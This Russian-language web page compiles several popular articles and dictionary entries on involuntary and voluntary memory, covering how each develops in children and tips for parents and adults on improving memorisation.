Непроизвольная память и произвольная память » Битрейника
На основании разных аспектов в психологии принято разделение памяти на разные виды, в том числе – на произвольную и непроизвольную.
Произвольная и непроизвольная память – это виды, которые определяются по критерию участия воли в процессе запоминания. Так, непроизвольная память – процесс запоминания, происходящий как бы «сам собой», без постановки цели запомнить и без дополнительных усилий со стороны человека. Как правило, непроизвольное запоминание сопровождается какой-нибудь яркой эмоцией.
Произвольная память – это сознательный процесс, который предполагает для достижения результата осознанную постановку цели и приложение определённых усилий.
Непроизвольная память ребенка
В раннем детстве память является частью ощущений и восприятия. Взрослые обращаются к малышу с просьбой вспомнить название предмета, чьё-то имя, какое-то действие. Память становится частью общения и частью овладения языком.
В дошкольный период память стремительно развивается, опережая остальные способности. Активное развитие всех видов памяти, происходящее в это время, в будущем станет основой полноценного развития малыша.
В возрасте 2-3 лет ребёнок повторяет слова и рифмованные строки. До начала школьного периода у ребёнка ведущую роль играет непроизвольное запоминание, основанное на впечатлениях малыша – двигательных, слуховых, зрительных. В младшем и среднем дошкольном возрасте (3-4 года) и запоминание, и воспроизведение все еще осуществляются в основном непроизвольно, проявляясь как часть разных видов деятельности. Чем младше ребёнок, тем большую роль в запоминании играют впечатления, чувства. Для развития непроизвольной памяти важны наблюдения. Заостряя внимание ребенка на объекте или явлении, можно сформировать долговременную память.
Существуют некоторые основные закономерности непроизвольной памяти:
- Запоминается то, что является неожиданным, сильным раздражителем (крик, яркий свет, фейерверк).
- Запоминаются факторы, выделяющиеся из ожидаемого ряда: необычность предмета, контрастность цвета, прерывание или, напротив, возобновление процесса.
- Непроизвольно запоминаются те предметы или явления, которые каким-то образом близки, значимы, вызывают особый интерес, эмоцию.
- Запоминается то, над чем человек активно работает.
- Запоминается то, что важно, актуально для человека. Например, то, что связано с целью и содержанием деятельности человека.
Примерно с четырехлетнего возраста у дошкольников начинается развитие произвольной памяти. Играя, выполняя поручения взрослых, дети начинают осознанно как запоминать, так и вспоминать, и ближе к школьному возрасту непроизвольное запоминание уступает место преднамеренному вспоминанию.
Ребёнок-дошкольник ещё не умеет самостоятельно ставить себе задачи, ему необходима помощь родителей, их подбадривающие фразы вроде «давай-ка повторим ещё разок», «давай ещё разочек прочитаем». Основное развитие произвольной памяти приходится на период обучения в школе. В это время у ребёнка формируется логическая память, которая помогает работать с большими объёмами текста.
Если ребёнок проявляет желание запомнить что-то и старается найти и использовать для запоминания логические связи – это благоприятный признак формирования произвольной памяти.
Заниматься с ребёнком лучше всего в виде игры (упражнения и советы для взрослых и детей можно найти в нашей статье Упражнения для улучшения памяти. Но не менее важный момент – ежедневное общение с ребёнком. Спрашивайте его о том, как прошёл его день, что было интересного, во что играли, чем бы он хотел заниматься завтра. Так Вы помогаете ему и вспоминать, и выражать свои мысли.
Произвольная память дошкольника
Произвольная память начинает формироваться, как мы уже сказали выше, в среднем дошкольном возрасте, а первые её проявления хорошо заметны во время сюжетно-ролевых игр. Во время таких занятий ребёнок хорошо мотивирован, ведь без запоминания условий ему не выполнить взятой на себя роли.
Произвольный вид памяти формируется постепенно, на основе умственного развития малыша.
Предпосылками развития произвольной памяти дошкольника являются:
- Активность и успешное участие в играх.
- Выполнение действий, связанных с прошлым или будущим (например, когда нужно рассказать о чем-то, что было или выполнить что-то не сейчас, а несколько позже).
- Такое развитие речи, которое позволяет в том числе действовать и с воображаемыми вещами.
Сначала ребёнок учится этим предпосылкам у взрослых, а потом постепенно перенимает инициативу.
Немного подробнее остановимся на одной из важнейших предпосылок развития произвольной памяти дошкольника, каковой является игра.
В процессе игры развивается ум ребенка, приобретаются важные умения и навыки. Словесные игры, задействующие речь, одновременно развивают мышление и память; дидактические игры также улучшают память, учат следовать правилам и порядку действий.
В дидактических играх с детьми стоит обратить внимание на несколько важных моментов:
- Перед запоминанием нужно организовать восприятие ребенка, выделив признаки предмета (цвет, расположение, форму, количество).
- При запоминании нужно анализировать и сравнивать, выделять важные свойства и обобщать.
- Следует постепенно усложнять игру, например уменьшая время показа или увеличивая количество деталей.
- Нужно развивать самоконтроль, привлекая ребенка к проверке результатов запоминания и к анализу допущенных ошибок.
Процесс развития произвольного вида памяти у дошкольников включает такие важные моменты:
- Помощь взрослых, выделяющих подсказками значимые моменты: просьбы повторить, пересказать, рассказать; направление хода мыслей наводящими вопросами: «А что было дальше?». Это помогает ребёнку постепенно учиться осмысливать и связывать материал с целью запоминания.
- Выделение заданий, побуждающих вспомнить или запомнить.
- Осознание ребёнком необходимости овладения специальными способами запоминания.
Развитие произвольной памяти
Произвольная память начинает формироваться в процессе взросления ребёнка, когда он постепенно обучается действиям, помогающим лучше запоминать информацию, удерживать её в памяти в течение длительного времени и воспроизводить как можно точнее. Завершается этот процесс примерно к 14 годам.
В процессе обучения ребёнка в школе развитие произвольной памяти приобретает все большее значение: растёт объём информации, которую необходимо запомнить, не всегда её можно подать ярко и наглядно, и не всегда она совпадает со сферой заинтересованности ребёнка. Но, с другой стороны, для разностороннего развития недостаточно усваивать только то, что интересно. Кроме того, развитие произвольной памяти и её активное использование важны для общего умственного развития, в том числе для приобретения навыков, без которых не обойтись старшеклассникам и взрослым людям – логически мыслить и делать выводы.
Как помочь ребенку развить произвольную память?
- Научите ребёнка выделять главную мысль и самые важные тезисы. Попробуйте подчеркивать предложения, содержащие главную мысль; возможно, так удобнее будет визуализировать информацию в виде схем, таблиц, рисунков. Таким образом задействуются и зрительная, и образная память, что улучшает запоминание.
- Научите ребёнка без боязни работать с большим объёмом информации: делить её на смысловые блоки, находить между ними логические связи, систематизировать.
- Повторение – мать учения, но повторять тоже нужно уметь. Научите ребенка несколько раз, вдумываясь в смысл, повторять выделенную мысль (правило, формулу). После прочтения параграфа пусть ребенок перескажет его вслух – сам себе. Объясните ему, что так он справится с выполнением задания быстрее.
- Научите ребенка работать над ошибками: это залог развития важного навыка самоконтроля и одновременно улучшение запоминания.
- Используйте ассоциации, привязывая с их помощью незнакомый материал к знакомому. Это могут быть образные параллели с уже известной информацией, визуализация, стишки-подсказки (например, «каждый охотник желает знать, где сидит фазан» – в первых буквах этой известной фразы «зашифрованы» первые буквы последовательности семи основных цветов спектра в составе радуги).
- Объясняйте ребенку (особенно если тема сложна для его понимания), почему для него так важно её изучение. Понимание важности – отличный двигатель: это и стимулирует, и мотивирует.
Развитию памяти и внимания, мышления и восприятия способствуют развивающие игры онлайн.
Мы искренне желаем Вам успехов в саморазвитии!
Произвольная память — это… Что такое Произвольная память?
- Произвольная память
- — психический познавательный процесс, который осуществляется под контролем сознания в виде постановки цели и использования специальных приемов, а также при наличии волевых усилий.
Психология человека от рождения до смерти. — СПб.: ПРАЙМ-ЕВРОЗНАК.
Под общей редакцией А.А. Реана.
2002.
- Продуктивность
- Произвольное внимание
Смотреть что такое «Произвольная память» в других словарях:
Память эксплицитная — (англ. еxplicit – имеющий открытое выражение, маркированный) – произвольная память, память на материал, который был запечатлён или представлен в сознании благодаря произвольным усилиям … Энциклопедический словарь по психологии и педагогике
ПАМЯТЬ — способность когнитивной системы живых существ кодировать и сохранять информацию при участии, как правило, высших когнитивных процессов. Первые попытки научного исследования человеческой П. берут свое начало с работы нем. психолога Г. Эббингаузе… … Философская энциклопедия
Память — У этого термина существуют и другие значения, см. Память (значения). Эта статья или раздел нуждается в переработке. Пожалуйста, улучшите … Википедия
ПАМЯТЬ — психофизиол. процесс, выполняющий функции закрепления, сохранения и последующего воспроизведения прошлого опыта (в виде образов, мыслей, действий, чувств). Обеспечивает накопление впечатлений об окружающем мире, служит основой приобретения знаний … Российская педагогическая энциклопедия
Память декларативная — (лат. declaratio – заявление, объявление) – произвольная или эксплицитная память, благодаря которой индивид может в свободной форме рассказать о том, свидетелем чего он оказался … Энциклопедический словарь по психологии и педагогике
Память — Способность организации и сохранения прошлого жизненного опыта, позволяющая его повторное использование в деятельности или возвращение в сферу сознания. П. осуществляет связь времен – прошлого, настоящего и будущего и является важной психической… … Толковый словарь психиатрических терминов
память произвольная — П., при которой фиксируется внимание на процессе запоминания … Большой медицинский словарь
НЕПРОИЗВОЛЬНАЯ ПАМЯТЬ — вид памяти, характеризующийся тем, что человек запоминает и воспроизводит, не ставя перед собой специальной цели что либо запомнить или припомнить. Противоположным понятию Н. п. является произвольная память. О ней говорят в тех случаях, когда… … Энциклопедический словарь по психологии и педагогике
Высшие психические процессы — сложные, прижизненно формирующиеся системные психические процессы, социальные по своему происхождению. К числу высших психических процессов относятся произвольная память, произвольное внимание, мышление, речь и др … Психология человека: словарь терминов
Световой пистолет — Zapper световой пистолет для приставки NES. Версия для США.[1] Световой пистолет указывающее устройство для … Википедия
что это такое? В каком возрасте начинает формироваться? Способы развития памяти у младших школьников и у взрослых
«Выбрось это из головы, выучи лучше таблицу умножения!» Иногда такие требования, предъявляемые к ребенку, не могут быть выполнены. Они не взаимосвязаны, так как разную информацию мы храним на разных «дисках» своей произвольной и непроизвольной памяти. Первая отвечает за то, чтобы мы знали таблицу умножения, вторая действует сама по себе и заносит в нашу память все, что ей заблагорассудится — яркие события, сильные эмоции, интересные образы, гениальные идеи и так далее.
Но наша задача – не идти у нее на поводу и оставить место для знаний. Их можно получить только специально, задействовав при этом произвольную память.
Характеристика
Задача произвольной памяти – фиксировать информацию, полученную ее обладателем специально (заучивание той же таблицы умножения, например). Она помогает нам выучить стихотворение, запомнить свой адрес, паспортные данные. Да, в реальности есть люди, которые знают их наизусть, и иногда это на самом деле весьма полезно.
Однако формироваться такая память начинает в возрасте, когда до получения главного документа гражданина еще далеко. В психологии считается, что это происходит в начальной и средней школе, когда у ребенка появляется осознанное желание или необходимость что-либо выучить (запомнить).
Развитие произвольной памяти предполагает множество факторов. В том числе и то, что было заложено в нас еще в совсем юном возрасте, еще до школьной скамьи.
Как это работает?
Уровень эффективности произвольной памяти зависит не только от того, что конкретно мы учим и зачем, но и от методов, которые мы используем для запоминания. Кому не знакомо состояние на экзамене, когда, отправляясь на него, мы чувствуем себя в полной боевой готовности, ведь позади – сутки в библиотеке, бессонные ночи над учебниками, а получая карточку с вопросами, впадаем в ступор с примесью амнезии или, наоборот, неожиданно для самих себя демонстрируем лучшие стороны своей произвольной памяти и получаем высший балл.
Конечно, тренировать память можно и нужно и во взрослом возрасте, но, как известно, все проблемы родом из детства и вот на что нужно обратить внимание родителям, чтобы их ребенок не столкнулся с проблемами во взрослом возрасте.
- Старайтесь, чтобы ребенок принимал участие в различных играх, в идеале – периодически брал на себя лидерство.
- Пробуйте повторять с ребенком уже пережитые события, вспоминайте походы в зоопарк или цирк. Пусть ребенок расскажет, чем ему запомнился тот или иной зверь или выступление на манеже, какие шутки клоуна показались ему особенно смешными. Через пару дней вновь вернитесь к этой теме.
- Чаще используйте игры с использованием слов. Только не надо сразу «грузить» малыша играми в «города», «съедобное – несъедобное» для начала вполне подойдет. Ведущий кидает мяч участникам и при этом произносит слово, задача ребенка – поймать мячик, если было названо нечто съедобное и не поймать, если было произнесено наименование несъедобной вещи.
- Не заставляйте ребенка зубрить что-либо, попробуйте вызвать в нем эмоции, попробуйте сами красочно описать ему тот или иной предмет или событие, чтобы в его памяти осталось не только название, но и образы.
- Научите ребенка понимать то, что он учит.
- Объясните ребенку, как и зачем пригодятся ему полученные знания.
Функции
Произвольная память позволяет нам не только участвовать в конкурсе чтецов или состязаниях типа «Что? Где? Когда?». Знания, заложенные в нашу кладовую мозга посредством произвольной памяти, необходимы как в профессиональной деятельности, так и в повседневной. Вы же не достаете каждый раз поваренную книгу, прежде чем начать готовить щи? Достаете? Тогда вы просто не умеете их готовить. Может быть, вы заядлый путешественник? Разве знания, полученные и зафиксированные вашей произвольной памятью в школе, вам ни разу не помогли?
Отсюда — очевидная функциональность произвольной памяти, именно она помогает нам собирать багаж знаний.
Особенности развития
Формирование произвольной памяти заканчивается приблизительно к 14 годам. От того, насколько удачным получился этот процесс, зависит, как будет протекать жизнь человека в дальнейшем. Ведь именно произвольная память помогает нам логически мыслить, делать выводы. Для ее развития у младших школьников, а именно в этом возрасте есть все шансы создать благодатную почву, когда необходимая информация будет буквально «врастать», существует много способов и приемов, в том числе и перечисленных выше. Но главное – научить ребенка работать с информацией.
И для этого нужно привить ему следующие навыки.
- Умение выделять главную мысль. Для начала попробуйте просто подчеркивать то, что наиболее значимо в тексте. Также рекомендуется применять в процессе обучения различные схемы, графики, рисунки. Таким образом, на помощь произвольной памяти вы позовете и зрительную.
- Умение работать с большими объемами информации. Объясните ребенку, что не стоит бояться большого количества строк или цифр, которые нужно запомнить. Научите разбивать их на логические цепочки, объединять по смыслу, искать взаимосвязи.
- Повторение пройденного материала. Делать это нужно с пониманием того, что выучили. Нужно не просто произносить вслух заученные фразы или правила, а вдумываться в смысл того, что произносишь. Кстати, именно повторение необходимой к запоминанию информации вслух помогает быстрее отложить ее в нашей памяти и на более долгий срок.
- Работа над ошибками. Это не прихоть наших педагогов из советского прошлого. Когда ребенок сам исправляет свою ошибку, он запоминает правильный вариант написания слова, формулы. Это не только оградит его от допущения подобных промахов в будущем, но и заставит более усердно работать над выполнением следующего задания. Кому же хочется тратить лишнее время на учебу, когда под окнами ребята гоняют в футбол, а в соцсети уже давно «висит» в ожидании любимая одноклассница.
- Умение составлять ассоциативный ряд. «Притягивайте» новую информацию к уже знакомому материалу. Как пример из того же советского детства – стишок для запоминания порядка цветов в радуге «Каждый охотник желает знать, где сидит фазан». Используйте подобные уловки для запоминания «неудобной» для вашего мозга информации.
И еще несколько советов, которые помогут сделать произвольную память лучше как детям, так и взрослым.
- Концентрируйтесь на поставленной задаче. Если вам нужно выучить стихотворение, то не стоит отвлекаться на то, как муха села на варенье, зачем папа (муж) полез в холодильник, и что за СМС-ка пришла.
- Сортируйте нужную информацию по общим или похожим признакам. Вчера изучали строение кожи, а сегодня пытаетесь запомнить географическое положение Италии? Из кожи делают сапоги, а Италия, если посмотреть на нее с высоты птичьего полета, очень похожа на сапог. Ищите ассоциации во всем.
- Чтобы запомнить числа, делайте то же самое. Вместо того, чтобы зубрить, вспомните, какие ассоциации вызывает то или иное число. Например, 1970 — год рождения, 16 — первая любовь и так далее.
- Отправляясь в новую страну, выучите хотя бы пару слов на языке, на котором там говорят. Еще лучше освоить ряд фраз, которые позволят вам обменяться любезностями с персоналом при заселении в гостиницу, заказать еду в ресторане. Так вы не только окажете уважение местным, но и улучшите свою память.
Кстати, изучение иностранных языков даже учеными признано верным способом повышения интеллектуальных способностей. А мы ведь к этому и стремимся, развивая свой головной мозг и произвольную память.
Что такое произвольная память 🚩 Произвольная память 🚩 Дети 🚩 Другое
Работа произвольной памяти тесно связана с произвольным вниманием. Если непроизвольное внимание само обращается на интересные вещи и ситуации, произвольное нужно направлять самому. Успех произвольного запоминания во многом зависит от способности сконцентрироваться, а также важна правильная мотивация. Для произвольного запоминания было придумано много мнемотических техник, облегчающих этот процесс. Например, построение слова из первых буков ряда понятий, которые необходимо запомнить.
При произвольном запоминании человек должен четко осознавать, для чего ему нужна информация, ему нужно задать себе установку. Некоторые ученые считают, что при непроизвольном запоминании тоже имеются установки, только они не осознаны. Установки для произвольной памяти могут даваться на полное или частичное, точное или приблизительное, кратковременное или долговременное запоминание. Человек учится давать себе эти установки, начиная с младшего школьного возраста.
Когда дается установка на точность запоминания, в основном читают материал очень поверхностно, без вникания в смысл. При воспроизведении характерно стремление «увидеть» выученный фрагмент в памяти, для этого человек может закрыть глаза. Иногда заучиваемый материал насыщается эмоционально, чтобы облегчить его понимание и усвоение. Если установка дается на полноту воспроизведения, обращают внимание не на отдельные части материала, а на их связь друг с другом. Для долговременного запоминания важно регулярное повторение.
На произвольное запоминание влияют условия, в которых запоминается материал, и индивидуальные качества запоминающего. Наличие эмоционального отношения и интереса, а также степень сложности материала. Различны и мотивы для запоминания, которые движут человеком. Например, мотивами могут служить похвала или возможность победить в соревновании.
Произвольное запоминание протекает так. Сперва происходит осмысление материала, понимание его главной идеи. Нужно стараться как можно ярче представить прочитанное в виде образов. Это нужно для установления связи между частями прочитанного. Параллельно происходит сопоставление новой информации с опытом и имеющимися знаниями. Ранее неизвестному уделяется наибольшее внимание. После этого последовательность образованных ассоциаций запоминается и закрепляется в памяти с помощью многократных повторений.
что это такое? Чем отличается от произвольной памяти, и что является основанием для их разделения? Особенности запоминания согласно психологии
Человеческая память настолько многогранна, что о ней трудно рассказать в двух словах. Интеллект у людей отличается от других обитателей Земли тем, что он наделен очень мощными свойствами. В первую очередь они обеспечиваются памятью. Без нее мы не можем обучаться и логически мыслить. Есть произвольная и непроизвольная память. О последней необходимо рассказать отдельно.
Характеристика
Когда регулировка определенной программы отсутствует, тогда такой процесс называется непроизвольной памятью. Просто запоминание в человеческом мозге происходит непроизвольным образом, то есть индивид не прилагает усилий к запоминанию.
Именно поэтому человек не может вспомнить абсолютно все мелочи, которые встречаются у него на пути. Субъект запоминает и забывает определенную информацию выборочно.
Произвольная и непроизвольная память выявляются по характеру участия воли личности к процессу запоминания. Они отличаются. Непроизвольная память – это процесс, который происходит «сам по себе», а именно индивид не устанавливает цель запомнить информацию и не принимает активное участие в данном этапе. Порой, чтобы включилась непроизвольная память, надо включить эмоции. Если речь идет о произвольной памяти, то здесь основанием разделения является сознательный процесс, который предполагает приложение усилий к запоминанию. В психологии принято считать, что память человека движется вперед благодаря совершенствованию средств запоминания. Натренированный интеллект – это овладение способами запоминания.
В результате многочисленных исследований был выявлен целый структурированный ряд развития памяти. Например, были определены такие направления, как возраст личности, ее зависимость от деятельности, ее степень владения способами запоминания, качество материала, который необходимо запомнить, мотивация и т. п. И если память развита, то непроизвольное запоминание нельзя считать более слабым, в отличие от произвольного. Первое в большинстве случаев даже превосходит второе.
Путем исследований также было установлено, что запоминается лучше тот материал, к которому индивид приложил максимум внимания и сознания.
Как это работает?
Непроизвольная память – это итог какого-либо действия и одновременное условие для принятия практических действий. Мы даже не подозреваем, какой процесс происходит в нашем сознании, когда о каком-либо событии говорим так: «запомнилось само по себе». И тем не менее этот процесс имеет строгую закономерность.
Исследования показали, что продуктивность непроизвольного запоминания зависит от содержания основной цели деятельности. Материал для усвоения может занимать различные места в деятельности, поэтому он также имеет различное значение. В результате он наделяется различной ориентировкой. Она требует активности тогда, когда нужно достичь результата. Значит, если идет активная умственная работа, то материал запоминается хорошо.
Однако материал может также и удаляться из памяти. Такой процесс провоцируется невозможностью актуализации информации. Он также связан с мотиваций, которая способствует ее удалению. Обычно из памяти удаляется неприемлемая информация. Например, если вам сделали больно, то ваша психика включит защиту, чтобы не травмироваться еще больше от причиненного ущерба. Так произойдет вытеснение негативных воспоминаний.
Но это не значит, что она будет полностью утеряна. Просто при такой потере действуют неосознанные процессы. Чтобы знания снова возникли в памяти, индивиду нужно понять непонятные мотивы. Именно они стимулируют удаление неприятных моментов.
Фрейд утверждал, что путешественники, побывавшие в одном и том же круизе, будут рассказывать о проделанном пути совершенно по-разному. И все это произойдет потому, что ощущения и восприятия у каждого человека свои собственные, и мотивы к запоминанию также индивидуальны.
И все это связано с тем, что содержание нашей памяти сильно взаимодействует с восприятием. Например, произошедшие события могут быть нелицеприятными, с ними могут сочетаться ужасные моменты. И, тем не менее, забыться может не именно негативная сторона, а та, что ассоциируется с негативом.
Известный психолог З. Фрейд нашел этому конкретный пример. Он рассказывает в своих трудах о том, как пообещал купить шкатулку в подарок своей близкой знакомой. Магазин, в котором продавалась вещица, стоял рядом с домом, где обитал его враг. Так вот, Фрейд забыл место, где находится магазин. И это самый красочный пример того, как ассоциативная связь влияет на забывание неприятностей.
Человек, намеревающийся выполнить действие и осознающий, что он обязан воплотить задуманное действие, будет стремиться к этому, несмотря на прошествие некоторого времени. Однако этот же индивид может передумать что-нибудь делать. Произойдет такое в результате осознания будущих действий, и тогда возникнет вопрос: «А надо ли это делать?». После чего желание начнет исчезать из памяти. И произойдет это тогда, когда столкнутся чувства – долга и внутреннего отрицания предстоящей деятельности.
Функции
Если говорить о памяти в целом, то можно сказать, что это познавательный процесс, который включает запоминание, забывание и даже сновидения. Иногда мы наблюдаем факты непроизвольного запоминания тогда, когда движение, связанное с чем-либо, резко обрывается. Например, внезапно выключается свет или все данные на компьютере закрываются. Однако мы непроизвольно запоминаем информацию, которая была прочитана или написана перед самым выключением. Когда гаджет снова включается, то мы можем определить, на каком именно месте был прерван процесс.
Потребности любого индивида вызывают впоследствии определенные действия. Если желания остаются, то деятельность будет доведена до конца. Когда это происходит, то индивид больше не испытывает стремления к каким-либо действиям. Ситуация разряжается. Например, человек захотел выпить стакан воды. Это желание побуждает его пройти на кухню и выполнить задуманное. Внезапно раздается звонок, и человек ненадолго вынужден прервать свои действия. Поговорив по телефону, он пройдет на кухню, нальет в стакан воду и выпьет.
В этом процессе напрямую будет задействована непроизвольная память. Несмотря на внезапный звонок, тенденция к выполнению действия была сохранена. А значит, и действие, пока оно не будет выполнено, останется в памяти индивида. Итак, можно сказать, что потребностное напряжение воздействует на память человека. Содержание непроизвольной памяти и ее функции связаны с деятельностью и отражают ее в полной мере. Поэтому здесь исключены ошибочные действия. Благодаря вышеперечисленным функциям непроизвольного запоминания человек может не только начать какое-либо дело, но и закончить его. Итак, непроизвольное запоминание происходит безо всяких усилий, «на автомате».
Данный вид определяет сильные и необычные сигналы внешней и внутренней среды, которые вызывают у человека определенные чувства или интерес.
Способы развития
Непроизвольную память необходимо развивать всем без исключения. Это существенно поможет в жизни, поэтому выполняйте следующие рекомендации. Они служат примером развития памяти, а также помогают расширить интеллект.
- Нужно выполнять заучивание наизусть. Это является самой главной техникой.
- Производный вариант от заучивания наизусть – это пересказ.
- Перенос опыта или экстраполяция. Здесь выводы распространяются с одной части на другую, а также выявляются закономерности в изучаемом предмете. Когда человек научится переносить опыт, он научится выстраивать аналитические цепочки.
- Ассоциации вызывают чувства, и материал так лучше запоминается.
Еще необходимо применять следующие факторы, которые также позволят улучшить память.
- Развиваем уверенность в себе. Когда вы испытываете это чувство, у вас гармоничное психологическое состояние и физиологическое благополучие. Клетки головного мозга начинают работать с удвоенной силой.
- Стремление к положительным эмоциям активирует пассивные клетки мозга.
- Всепоглощающая заинтересованность дает возможность к быстрому запоминанию.
- Исключению помех способствует концентрации внимания.
- Учитесь преобразовывать материал. Когда материал для запоминания выглядит монотонным, то мозг начинает ставить препятствия к его восприятию. А если сделать его не занудным, а интересным, то дело пойдет иначе. Чтобы добиться цели, сочините небольшой рассказ. Так легко усвоить любую информацию.
- Поставьте цель – обязательно усвоить информацию. Если вы будете многократно повторять одно и то же, вы все равно ничего не сможете запомнить, если не поставили цель.
В завершение необходимо привести пример наиболее подходящего приема непроизвольного запоминания. Знайте, что под воздействием сильных эмоций включается очень сильный процесс непроизвольного запоминания.
Поэтому используем данный фактор и подбираем такие источники знаний, которые могут нас шокировать. Так в голове отложится большая часть информации. Например, если вы хотите усвоить исторические данные, то найдите самые интересные моменты, которые будут во всех «красках» описывать события, произошедшие в прошлом.
Также для развития памяти можно использовать таблицы Шульте. Классическая таблица выглядит как квадрат, состоящий из 5 строк и 5 столбцов. В ячейках расположены в произвольном порядке числа от 1 до 25. Сначала нужно освоить матрицы 5х5, а затем переходить к более сложным заданиям. Для этого есть большая таблица 9х9.
Произвольная память
Память в жизни человека играет очень важную роль, как в работе, в учебе, так и в личной жизни. Давайте рассмотрим, что же такое память и что такое произвольная память в психологии.
Память — это вид умственной деятельности, которая предназначена сохранять, накапливать и использовать информацию для организации деятельности человека. Без нее человек не сможет мыслить и обучаться.
Виды памяти классифицируются по нескольким критериям:
- по характеру активности;
- по цели деятельности: произвольная и непроиз¬вольная память;
- по продолжительности запоминания и сохранения материала.
Произвольная память – это понятие, которое означает процесс психологии человека, который осуществляется благодаря контролю сознания, путем постановки конкретной цели и использования специальных приемов, а также при наличии волевых усилий. То есть, если человек ставит себе задание что-то запомнить, то тогда включается в работу данный вид памяти. Произвольная память предполагает наличие четкой цели что-либо запомнить, которую человек ставит и прилагает к этому собственные усилия. Наличие произвольной памяти помогает человеку в дальнейшей деятельности, умственном развитии и становлении личности. Память с произвольным доступом представляет собой цель и задачу запечат¬леть, сохранить в голове, а также в дальнейшем воспроизвести какие-то знания, навыки или факты, приобретенные в прошлом. Это наиболее продуктивный вид памяти из всех, которыми обладает человек.
Развитие произвольной памяти
Легче всего этот процесс осуществлять еще с детства и заключается он в следующем:
- Научить ребенка понимать задачу. Для этого самым эффективным способом является игра, благодаря которой перед ним стоит ясная задача запомнить и вспомнить. В ходе активного запоминания ребенок повторяет все несколько раз. Такой вид запоминания усваивается детьми и потом при постановке задачи он уже мысленно возвращается в ситуацию, когда запоминал процесс и выдает нужную информацию.
- Освоить приемы, которые направлены на получение понятной цели запомнить и воспроизвести. Здесь требуется развить прием “повторения”, так как он легче всего формируется и для его освоения не нужно ранее обучаться каким-либо действиям. Прием повторения перейдет в форму, при которой ребенок будет повторять не в течении формирования задачи, а после ее приема. Т.е он самостоятельно будет воспроизводить задание.
- Научиться контролю результатов выполнения цели, проводить самопроверку. Целью проверки является исправление допущенных ошибок и не повторению их в будущем.
Все то же самое вы можете проделать и в зрелом возрасте. Важно лишь уделить на этот процесс чуть больше времени. Развивайте вашу память и вы сможете добиться успеха во всех сферах жизни.
Развитие произвольной памяти | Познание мира
Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.
Наверняка многие из вас знают, что психологическая наука уделяет много времени на исследование человеческой памяти. Без нее жизнь протекала бы лишь мгновениями, люди не могли бы вспомнить прошлое и помечтать о будущем. Память возможно развить только тогда, когда у человека нет выходящих за рамки патологий, приводящих к нарушениям памяти. Другими словами, для эффективной работы памяти необходимо:
- Проверить есть ли нарушения в коре головного мозга.
- Отбросить лишний материал, то есть лишние образы, мешающие запомнить информацию.
- Уделить внимание предмету запоминания.
Важно! Чтобы иметь хорошую память, необходимо уметь фиксировать внимание.
Изначально человек не уделяет должного внимания тому, что чувствует, видит, слышит. Память развивается тогда, когда активизируются чувственные и мыслительные способности. Метод ассоциации значительно упрощает запоминание.
SOURCE
Виды памяти
Условно память можно разделить на три категории:
По содержанию психической активности | По продолжительности сохранения материала | По степени волевой регуляции |
Двигательная. | Мгновенная. | Непроизвольная. |
Образная: 1) Зрительная; 2) Обонятельная; 3) Слуховая; 4) Вкусовая; 5) Осязательная. | Кратковременная. | Произвольная. |
Эмоциональная. | Долговременная. | |
Словесно-логическая. | Оперативная. |
Память на позу, положение тела развивается достаточно рано. Это и есть двигательная память. Наверняка многие из вас замечали, что во время прогулки легче думается и принимается решение. Дело в том, что во время движения кровь быстрее попадает в мозг. В результате он начинает лучше функционировать.
Важно! Блестящей двигательной памятью обладают танцоры, спортсмены, а также люди, род занятий которых вынуждает много двигаться.
Образную память невозможно представить себе без
составляющих. У большинства людей развита зрительная память, однако она характерна
тем, что со временем запомнившиеся образы начинают терять свои очертания. К
примеру, одни детали упрощаются, опускаются или меняют очертания.
Это касается и других видов образной памяти. С течение времени они утрачиваются вкусовые, слуховые, обонятельные впечатления. У детей, подростков, а также музыкантов и художников сильно развита образная память.
SOURCE
Эмоциональная
память хранится дольше всего. Наверняка вы помните день рождения ребенка,
праздники, устраиваемые семьей или интересно проведенные студенческие годы,
горькие моменты в жизни. Младенцы также рано начинают отличать «своих» от
«чужих».
Известный ученый В. Н. Мясищев в трудах, посвященных эмоциональной памяти отмечал, что когда дошкольникам показывали рисунки, дети отлично запоминали (практически на 100%) те, которые им нравились. И в точности до наоборот — не запоминали скучные, по их мнению картины.
SOURCE
Словесно-логическая
память формируется в течение всей жизни. В 10-13 лет память достигает
наивысшей силы. Характерной особенностью ее является точное воспроизведение,
которое достигается силой воли.
Внимание! Произвольная память значительнее всего развивается в период становления личности, то есть в 10-13 лет.
Воспроизвести фразу значительно легче, чем образ, но и здесь зачастую кроются подводные камни. При запоминании фраз легче всего воспроизводятся первые и последние слова. Многие из них сокращаются, а запомнившиеся детали переносятся в начало предложения.
SOURCE
Развитие произвольной памяти
В чем же основная разница между произвольными
и непроизвольными видами памяти? Если человеку незатруднительно запомнить и
восстановить некоторое событие или предмет в памяти, то такую память называют
непроизвольной. К примеру многие запоминают то, что бросается в глаза, особенно
события создающие неудобства по дороге на работу. Это и светофор с горящим красным
светом и еле пыхтящий автобус, медленно снующий по тротуару пешеход и так
далее.
Внимание! Произвольная память отличается тем, что ее легко запомнить.
Причем данная память становится эффективнее от степени
заинтересованности. Все зависит, насколько человеку хочется запомнить
полученную информацию, какова его цель, а также от приемов заучивания.
Приемы заучивания различаются между собой. Это:
- механическое повторение;
- логический пересказ;
- образное мышление.
Механическое или многократное повторение — это трудоемкий, длительный процесс, причем не всегда эффективный. Логическое заучивание или логический пересказ более результативно, так как изучаемый материал осмысливается, выстраивается в систему. Образное мышление хорошо тем, что изменяет в сознании неинтересную информацию на картинки, схемы, графики.
SOURCE
Память, влияющая на продолжительность сохранения материала
Мозг устроен так, что в нем есть ячейки, отвечающие за память, которая иногда приходит на одно мгновение, или на недолгое время. Некоторая информация хранится несколько дней, а есть ячейка, из которой извлекается тот материал, который лежал в ней на протяжение всей жизни.
SOURCE
Научно память делится на:
- мгновенную;
- кратковременную;
- долговременную;
- оперативную.
Мгновенная
память практически не хранит информацию. Она вне времени. Еще в раннем
детстве малыши приучаются делать выбор. Одну информацию они сохраняют, а другую
пропускают. Не редки случаи, когда необходимо вспомнить нечто важное, но
сделать это невозможно.
Кратковременная память хранит информацию некоторое время. С
ее помощью обрабатывается огромный материал, поступающий извне. Кратковременная
память отбрасывает лишний материал и сохраняет нужную информацию.
После этого усвоенный материал полностью исчезает из памяти,
либо переходит в раздел долговременной памяти.
Долговременная память нормально функционирует лишь при
хорошей кратковременной памяти. Долговременная память хранит информацию в
течение неограниченного срока. Перевести информацию в эту ячейку памяти можно
лишь волевым усилием. Например, неоднократно повторяя материал, предназначенный
для запоминания.
Долговременная
